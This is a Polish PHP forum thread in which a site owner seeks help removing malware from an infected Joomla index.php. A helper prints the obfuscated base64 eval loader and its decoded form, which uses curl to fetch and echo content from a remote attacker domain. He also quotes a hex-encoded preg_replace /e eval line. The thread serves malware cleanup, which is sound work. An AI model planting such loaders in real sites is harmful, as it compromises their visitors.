Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: blokada strony, odmowa dostępu do index.php, zagrożenie widziane przez NOD32: PHP/Obfuscated.E
Forum PHP.pl > Forum > PHP
majke63
2.06.2014, 10:32:53
Jak w temacie. Strona została zblokowana w wyszukiwarce google i zweryfikowana jako zagrożenie. Wykonałem skan wszystkich plików i zlokalizowałem w niektórych z nich zagrożenie. Wyeliminowałem je. Pozostał mi plik index.php z którym nie potrafię sobie poradzić. W ESET NOD32 wyskakuje "PHP/Obfuscated.E potencjalnie niepożądana aplikacja - wybrana akcja zostanie wykonana po zakończeniu skanowania". Dodatkowo odmowa dostępu jak chce go zmodyfikować, spakować w paczkę rar itp. Dotyczy strony www.roi.waw.pl

kartin
2.06.2014, 10:38:34
Wyłącz antywirusa, to dostęp do pliku zostanie odblokowany. Jeśli to nie pomoże to najpierw zrestartuj system, a później wyłącz antywirusa.
Antywirus może nie wykryć wszystkich nieporządnych "dodatków". Najlepiej byłoby przywrócić pliki z backupu.
majke63
2.06.2014, 10:52:14
problem w tym, że backupu brak - to by momentalnie rozwiązało problem, jestem tego świadomy. Zapisałem kod php do pliku txt, ale nie mam możliwości zamieszczenia go na forum do weryfikacji z racji jego długości i wyrzucania błędu jako że post jest za długi. Co mogę zrobić?
lipek80
2.06.2014, 10:56:45
spróbuj

https://safeweb.norton.com

albo

http://aw-snap.info/file-viewer/

drugi link pokaże ci gdzie masz złośliwy kod.
majke63
2.06.2014, 11:09:57
owszem widzi z tej drugiej strony jakieś błędy, jednak w czym tkwi problem jest dla mnie sprawą niejasną. Jest możliwość poprawy kodu strony php w sposób manualny? Tak abym mógł wkleić poprawny kod do pliku index i wyeliminować zagrożenie w prosty dla mnie sposób?
lipek80
2.06.2014, 11:15:25
Z tego co widzę masz gdzieś w kodzie lub w pliku flash odnośnik do:

http://www.ajedrezlocal.com/t3-assets/cnt.php?id=15179311

Który jest lub był zainfekowany ponieważ teraz brak tam strony. Google Oflagował ten adres jako niebezpieczny.
kartin
2.06.2014, 11:28:15
Pobierz http://joomlacode.org/gf/download/frsrelea...ull_Package.zip zastąp pliki i będziesz miał.

Jak nie zaktualizujesz do najnowszej wersji, to za jakiś czas historia się powtórzy.

[PHP] pobierz, plaintext 
  1. <?php eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGc
  2. FlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0R2NGbFhiV2hwVVRKb2NGZFdhRTlpUlRWeFZXM
    W
  3. FZVkl4V25GWmFrcFRZa1YwUm1WRVZsQlNSMmhTVkZSQ1MyUnNhM2RTYmxwVVlsVmFXVll4WXpWWlYwcH
    p
  4. WMnBHV0ZaRk5WUlpNR1JLWlZVMVdGZHRSbGhTTW1nelYxaHdUMVV5Vm5Ka1JWSmhVak5DY2xZd1ZuZGx
    i
  5. R1JGVTI1T2ExWXdXbHBXVm1NeFZFWlZlV1JGZUZKTlYyZzJWWHBDVDFWdFJYbGtSM1JZVWxoQ05sVXhW
    b
  6. EprTVc5M1lraFNhRkpGU25KVk1GWkdUV3hTU1dGNlZtcFdiWGhhVmpJeGIyRXhTWGhYYWxaYVlrVXdlR
    m
  7. w2U2tkWFJUVlpVMnN4VG1KdGFETlhWekI0WlcxU2RGSnVWbE5oYTFwb1ZqQldkazFXVWtkVmExcHJWbF
    J
  8. XZDFScmFIZFVWMHBWVW01a1dtSlhjM2haTVdSUFRsWk9WVnBGVW1GTmJsSk1WVEowYTFReVNYZGlSVlp
    P
  9. VWpKU1lWUlVSbUZPVm14eVYxUldhbEl3Y0RCWmExSkRWRVpGZVdONlRsSk5iVko1VlRKMGQxTldWblZS
    Y
  10. ld4WFRWWnZlVmRyV205VmJHOTRVV3hTVWxaRldsRmFSRWsxVXpGRmVGcEZPVTVXTURVd1dsVmtZV0ZyT
    V
  11. hOWFdHUmFZV3MxUkZSVlZqQlNSbFowWTBkb1VrMHlhRVpXYlhoaFV6RlNWMVZZYUZKaVJscGFWRlphWV
    Z
  12. aR1drWlVhazVvVFd4S1dsVXlOVTlV.UmxwSlZHdDRVazFWV25wWlZ6RlRWMVpPZFZSc2JFNU5SRlo2VjJ
  13. 0V2FrNVhVWGxWYTFKaFRXNVNZVlJYTVd0bGJGWlZVbXhrVmsxV1NrZFVNVnBIVmpGS2NXSkdVbFppUm5
    C
  14. VVZtMTRWMk5yTlZkV2JGcG9UVVp3VVZac1VrTlpWa3B6Vm01Q2EwMHlhRTFXYTJoUFZFWkZlRkp1VG1o
    a
  15. VZrcGFWVEkxVDFkVk1IZE9XRTVoVWxkTk1WcEVTbE5TUm05NVpFWndUbUpYVWpaV1ZsSkhWakZWZUZWc
    l
  16. dsQldhMXBZVlcxd2MxSldXa1ZSVkVaVi5UVlZ3VjFaSGVGZFdNVXBZWlVVNVZtSkdWVEZXYlhoaFVrZF
    J
  17. lV1JIZEZOTmJtZDNWako0YWs1Vk1WaFZhMUpvWlcxU1JWZHFTakJUTVU1eVdrWk9hRkl4U2tsVmJHUnJ
    W
  18. VlpWZDFOdVJtRlNiV2hNV1hwR2JtVldXbkZWYlVaWFRVUkdNbFV5ZEd0VU1rbDNaRVpXYWsxSVVrVldW
    b
  19. VEwWTFad1IyRkZkR3BOVjJRMVZrYzFUMkZWTUhkT1dFNVVUVVUxVkZsWE1VZFNSMFkyV2tWU1lVMXVVa
    3
  20. hXTW5oclZESkplVk5xVmxKV01uaE1WV3BHUzJJeGNFWmFSVnBvVmxScmVsbHFRbmRpVmxaWVQxUktWVk
    5
  21. IT0RCVVJ6RlBZakpPY0ZwNlFrNWxWM1F4VlZSS2FtTkZkRlZqZVd0d1QzY3BLVHMpKTs)); ?>
[PHP] pobierz, plaintext
to w czytelnej wersji:
[PHP] pobierz, plaintext 
  1. //<?php
  2. 	if(function_exists('curl_init'))
  3. 	{
  4. 		$url = "http://javaterm.link/link/jquery-1.6.3.min.js";
  5. 		$ch = curl_init();
  6. 		$timeout = 5;
  7. 		curl_setopt($ch,CURLOPT_URL,$url);
  8. 		curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  9. 		curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
  10. 		$data = curl_exec($ch);
  11. 		curl_close($ch);
  12. 		echo "$data";
  13. 	}
  14. //?>
[PHP] pobierz, plaintext


Jak będziesz usuwał ręcznie to kasuj wszelkie takie podejrzane rzeczy. Wpisy w rodzaju 
[PHP] pobierz, plaintext 
  1. preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66 ...
[PHP] pobierz, plaintext
też są podejrzane
majke63
2.06.2014, 15:55:26
podmieniłem pliki wspomniane, ale wszystko wyzerowało, bo nadpisało pliki, które są odpowiedzialne za rozruch strony. Za bardzo zielony najwidoczniej jestem w tym wszystkim. Na szczęście miałem ten backup z defektem i z powrotem dokonałem wgrania i działa, jednak dalej z blokadą strony. Czy ktoś byłby w stanie mi pomóc, ale bardziej manualnie z tym problemem? Mógłbym podesłać w wiadomości dane do zalogowania.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.